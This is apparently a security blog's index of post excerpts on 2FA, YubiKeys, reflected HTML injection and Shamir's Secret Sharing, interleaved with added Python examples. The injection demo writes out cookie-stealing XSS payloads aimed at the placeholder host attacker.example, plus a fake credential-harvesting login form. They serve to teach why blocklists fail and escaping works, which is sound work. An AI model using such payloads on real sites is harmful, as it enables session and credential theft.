My CDN just asked me for all my Twitter API keys... WTF? This would give them complete access to my app's Twitter account, the ability to send and receive messages, and anything else that my API key allows. Giving them - or anyone - the entire set of credentials would be a very bad idea. What's going on? Twitter's slow-motion collapse and hostility to developers is causing a whole bunch of second-order effects. Lots of services let people log in to them using Twitter. It is (was?!) a…
Continue reading →
Behold! Thanks to the power of the Watchy development platform, I now have all my 2FA codes available at the flick of my wrist! HOWTO This uses Luca Dentella's TOTP-Arduino library. You will need a pre-shared secret which is then converted into a Hex array. Use the OTP Tool for Arduino TOTP Library to get the Hex array, Base32 Encoded Key, and a QR Code to scan into your normal TOTP generator. Add the Hex array into the code below. To check that it is functioning correctly, either scan…
Continue reading →
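The conversion step above (raw secret in, hex array for the sketch and Base32 key for the phone out) and the "check that it is functioning" step are easy to get subtly wrong, so here is the whole TOTP pipeline in plain Python. This is an added example, not code from the post or from the TOTP-Arduino library: the sample secret is the RFC 6238 test-vector key (constructed, not a real credential), and the account name and issuer in the otpauth URI are placeholders.

```python
import base64
import hashlib
import hmac
import struct
import time
from urllib.parse import quote

# Constructed sample secret: the RFC 6238 test-vector key, not a real credential.
SAMPLE_SECRET = b"12345678901234567890"


def secret_to_hex_array(secret: bytes) -> str:
    """Render the raw secret as a C initialiser, the shape an Arduino sketch pastes in."""
    return "{" + ", ".join(f"0x{b:02x}" for b in secret) + "}"


def secret_to_base32(secret: bytes) -> str:
    """Render the same bytes in the Base32 form phone authenticator apps expect."""
    return base64.b32encode(secret).decode("ascii")


def otpauth_uri(secret: bytes, account: str, issuer: str,
                digits: int = 6, step: int = 30) -> str:
    """The URI that goes into the QR code scanned by a normal TOTP app (placeholder labels)."""
    return (f"otpauth://totp/{quote(issuer)}:{quote(account)}"
            f"?secret={secret_to_base32(secret)}&issuer={quote(issuer)}"
            f"&algorithm=SHA1&digits={digits}&period={step}")


def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """RFC 4226: HMAC-SHA1 over the big-endian counter, then dynamic truncation."""
    digest = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = digest[-1] & 0x0F
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def totp(secret: bytes, unix_time=None, step: int = 30, digits: int = 6) -> str:
    """RFC 6238: HOTP with the counter set to the current 30-second window."""
    if unix_time is None:
        unix_time = int(time.time())
    return hotp(secret, unix_time // step, digits)


def verify_totp(secret: bytes, candidate: str, unix_time=None, step: int = 30,
                digits: int = 6, skew: int = 1) -> bool:
    """Accept a code from the current window or up to `skew` windows either side.

    A watch's RTC drifts; one window of tolerance is what most servers allow,
    so if the watch only matches with skew=1 its clock wants resetting."""
    if unix_time is None:
        unix_time = int(time.time())
    window = unix_time // step
    return any(hmac.compare_digest(hotp(secret, window + d, digits), candidate)
               for d in range(-skew, skew + 1))


if __name__ == "__main__":
    print("Hex array for the sketch:", secret_to_hex_array(SAMPLE_SECRET))
    print("Base32 key for the phone: ", secret_to_base32(SAMPLE_SECRET))
    print("QR code contents:        ", otpauth_uri(SAMPLE_SECRET, "me@example.com", "Example"))
    print("Code right now:          ", totp(SAMPLE_SECRET))
```

Both the hex array and the Base32 string are the same twenty bytes in different clothing; if the watch and the phone disagree, the usual culprits are a secret that was Base32-decoded twice, a Base32 string typed with `0`/`O` or `1`/`I` swapped, or a watch clock that is more than thirty seconds out. `verify_totp` uses a constant-time comparison because a server-side check of a guessed code should not leak how many digits matched.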
I'm not thick. I know it doesn't sound like much of a boast, but I'm pretty competent at this whole adulting lark. But it appeared that I had forgotten a 4 digit number I'd set up less than a minute ago! The security guard smiled wearily at me. "It happens to everyone!" she said. Which, I'll admit, was of small comfort. Work had taken the (sensible) decision that our entry cards weren't secure enough. In order to gain access to the building we needed to present our card and type in a 4 digital …
Continue reading →
Should my bank be able to block me from using their Android app, just because my phone is rooted? I'm reluctantly coming to the conclusion that... yeah, it's fair that they get to decide their own risk tolerance. Sage of the Internet, and general Soothsayer, Cory Doctorow once gave an impassioned speech on "The Coming War on General Computation". I'll let you read the whole thing but, I think, the salient point is that some people want to restrict the maths we're allowed to do on our…
Continue reading →
This is a curious book. It starts out as a look at the security of everyday objects, but quickly becomes a series of after-dinner anecdotes about various security related issues. That's not a bad thing, as such, but a little different from what I was expecting. There's no doubt that Mikko walks the walk as well as talking the talk. Almost every page contains a bon mot. For example: Working in information security is sometimes a bit like playing Tetris: your successes disappear but your…
Continue reading →
Codeberg is a hip new code hosting site - similar to GitHub and GitLab. And, much like Gits Hub & Lab, users can serve static content through Codeberg pages. Somehow I screwed up my configuration, and when I visited edent.codeberg.page/abc123 I got this error: Now, whenever I see something from the request echoed into the page's source, my hacker-sense starts tingling. What happens if I shove an innocent HTML element into the URL? edent.codeberg.page/abc<em>123 Aha! It lets through…
Continue reading →
After my blog post about recovering my accounts after a disaster, I followed the most repeated advice: get two YubiKeys; associate them both with your accounts; keep one off-site in a safe location. OK, done! My wife and I spent a very boring evening going through every single account we have which supports FIDO tokens with WebAuthn - about a dozen in total. We manually paired two keys each. We put our main key on our keyrings, then drove out to the woods and buried our spares in a…
Continue reading →
There's no way that I could find to report this to the Canadian Government - and I didn't fancy trying to raise a bug report with the first Mountie I met - so here's a blog post. As part of Canada's Electronic Travel Authorisation system, prospective visitors to the country get sent emails. The email I received had a broken image right at the top: At least there's some alt text! Gmail on Android doesn't let you view the source of an email, but the web version does. Here's what it says: …
Continue reading →
The other day, a company sent me a 2FA code which was only four digits long. I'll admit, this weirded me out. Surely 4 is just far too short. Right? I think almost every 2FA code I've seen has been 6 digits long. Even back in the days of carrying one of those physical RSA fobs, 6 has been the magic number. But why? A 2FA code is meant to prevent a specific class of problem. If an attacker has got hold of something you are (your username) and something you know (your password), you are…
Continue reading →
Another day, another unfiltered reflection of user-supplied content! You know how this goes by now. You type into a search box <em>test and the whole page suddenly turns italic. Luckily, the Macmillan Publishers' website filtered out any <script> elements it encountered. But that still leaves the attacker with the ability to draw SVGs over the page or, more maliciously, start harvesting usernames, passwords, and credit card details from unwary visitors. Here's a quick example of what an…
Continue reading →
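The Codeberg error page above reflects the request path verbatim, and the Macmillan search page strips `<script>` but nothing else. The example below, added here and not code from either site, puts the three behaviours side by side so you can see why the blocklist does not help: a constructed template stands in for the real pages, the payloads are constructed, and `attacker.example` is a placeholder host.

```python
import html
import re

# Constructed stand-in for the error / search-results page; the real templates
# are not shown in the posts, only the symptom (request text echoed into HTML).
TEMPLATE = (
    "<h1>No results for {query}</h1>\n"
    "<p>The page {query} could not be found.</p>\n"
)

# Constructed probes and payloads (attacker.example is a placeholder host).
PROBE = "abc<em>123"                     # the harmless test: does markup survive?
SCRIPT_PAYLOAD = "<script>fetch('https://attacker.example/?c=' + document.cookie)</script>"
SVG_PAYLOAD = "<svg onload=\"fetch('https://attacker.example/?c=' + document.cookie)\">"
FORM_PAYLOAD = ('<form action="https://attacker.example/login">'
                'Session expired, please log in again: '
                '<input name="user"> <input name="pass" type="password">'
                '<button>Log in</button></form>')

# A typical "strip the script tags" filter: opening and closing <script> tags only.
SCRIPT_TAG = re.compile(r"<\s*/?\s*script\b[^>]*>", re.IGNORECASE)


def render_unfiltered(query: str) -> str:
    """The Codeberg-style bug: request data dropped straight into the HTML."""
    return TEMPLATE.format(query=query)


def render_blocklist(query: str) -> str:
    """The Macmillan-style mitigation: remove <script> tags and nothing else.
    Every other element, event handler and form still reaches the browser."""
    return TEMPLATE.format(query=SCRIPT_TAG.sub("", query))


def render_escaped(query: str) -> str:
    """The fix: encode & < > \" ' so the browser treats the input as text.
    Correct for element content and quoted attribute values; a JavaScript
    string, URL or CSS context needs its own encoding instead."""
    return TEMPLATE.format(query=html.escape(query, quote=True))


def reflects_live_markup(renderer, payload: str) -> bool:
    """True if the payload reaches the page exactly as sent, i.e. the browser
    will parse it as markup rather than display it as text."""
    return payload in renderer(payload)


if __name__ == "__main__":
    for name, renderer in (("unfiltered", render_unfiltered),
                           ("blocklist", render_blocklist),
                           ("escaped", render_escaped)):
        for label, payload in (("probe", PROBE), ("script", SCRIPT_PAYLOAD),
                               ("svg", SVG_PAYLOAD), ("form", FORM_PAYLOAD)):
            live = reflects_live_markup(renderer, payload)
            print(f"{name:10} {label:7} {'LIVE' if live else 'inert'}")
```

The blocklist stops the `<script>` payload and nothing else: an `<svg onload>` runs script without a script tag, and the fake login form needs no script at all to harvest credentials, which is exactly the attack the Macmillan post describes. Escaping at the point of output is the fix; a Content-Security-Policy that disallows inline script is worth adding as a second layer, but it would not have stopped the form.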
I hate academic tests. Wouldn't it be great if you could find the official answer papers? Oh, cool, the OCR Exam Board is hosting answer sheets for all my classes! What happens if I click it? Yeach! It redirects users to a scammy ebook service hosted on an external website. Which, I assume, the exam board does not endorse. Alongside exam books, textbooks, literary classics - there's a bunch of material which probably isn't suitable for school… If you visit the root of the domain, it s…
Continue reading →
Shamir's Secret Sharing (henceforth "SSS") is clever. Far too clever for most people to understand - but let's give it a go. Suppose you have a super-secure password for a Really Important Thing. Th15IsMyP4s5w0rd!123 You can remember this - because you're awesome. But it might be a good idea to share the password with someone else, just in case. Of course, if you share it with one person, they'll be able to use it. No good! So you split the password into several overlapping pieces and give…
Continue reading →
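To make the "split it into pieces, any few of which recover the whole" idea concrete, here is a working Shamir split and recovery over a prime field. This is an added example, not the post's own code: it uses the password quoted above as the secret, picks the Mersenne prime 2^521 - 1 as the field (my choice, which caps the secret at 64 bytes), and a 3-of-5 scheme for the demonstration.

```python
import secrets

# 2^521 - 1, a Mersenne prime. The secret and every share are integers mod
# PRIME, so a secret may be at most 64 bytes (plus the one-byte guard below).
PRIME = (1 << 521) - 1
MAX_SECRET_BYTES = 64


def _poly_at(coeffs, x: int) -> int:
    """Evaluate coeffs[0] + coeffs[1]*x + coeffs[2]*x^2 + ... mod PRIME (Horner)."""
    acc = 0
    for c in reversed(coeffs):
        acc = (acc * x + c) % PRIME
    return acc


def split_secret(secret: bytes, shares: int, threshold: int, rng=secrets.randbelow):
    """Return `shares` points (x, y) on a random polynomial of degree threshold-1
    whose constant term is the secret. Any `threshold` points recover it;
    fewer reveal nothing, because every polynomial through them is equally likely."""
    if not 1 <= threshold <= shares:
        raise ValueError("need 1 <= threshold <= shares")
    if len(secret) > MAX_SECRET_BYTES:
        raise ValueError("secret too long for this field")
    # A leading 0x01 byte keeps the length exact even if the secret starts with NULs.
    s = int.from_bytes(b"\x01" + secret, "big")
    coeffs = [s] + [rng(PRIME) for _ in range(threshold - 1)]
    return [(x, _poly_at(coeffs, x)) for x in range(1, shares + 1)]


def recover_secret(shares) -> bytes:
    """Lagrange-interpolate the polynomial at x = 0 from the given shares.
    With fewer than `threshold` shares this still returns *a* value; it is
    simply not the secret, and the caller cannot tell from the output alone."""
    xs = [x for x, _ in shares]
    if len(set(xs)) != len(xs):
        raise ValueError("duplicate share")
    total = 0
    for xi, yi in shares:
        num = den = 1
        for xj in xs:
            if xj == xi:
                continue
            num = num * (-xj) % PRIME          # product of (0 - x_j)
            den = den * (xi - xj) % PRIME      # product of (x_i - x_j)
        total = (total + yi * num * pow(den, PRIME - 2, PRIME)) % PRIME
    raw = total.to_bytes((total.bit_length() + 7) // 8, "big")
    if raw[:1] != b"\x01":
        raise ValueError("not enough shares, or a share is corrupt")
    return raw[1:]  # drop the 0x01 length guard


if __name__ == "__main__":
    password = b"Th15IsMyP4s5w0rd!123"
    pieces = split_secret(password, shares=5, threshold=3)
    for x, y in pieces:
        print(f"share {x}: {y:x}")
    print("any three recover it:", recover_secret(pieces[1:4]) == password)
```

The shares are not fragments of the password: each one is a full-size field element that on its own says nothing about it, which is what separates this from cutting the string into chunks. Two things a practitioner should keep in mind: the shares must come from a real random source (the `rng` parameter exists only so tests can be deterministic), and plain Shamir gives no integrity, so a holder who returns a tampered share causes silent recovery of the wrong secret; the 0x01 guard catches most such cases here, but a verifiable scheme is the proper answer.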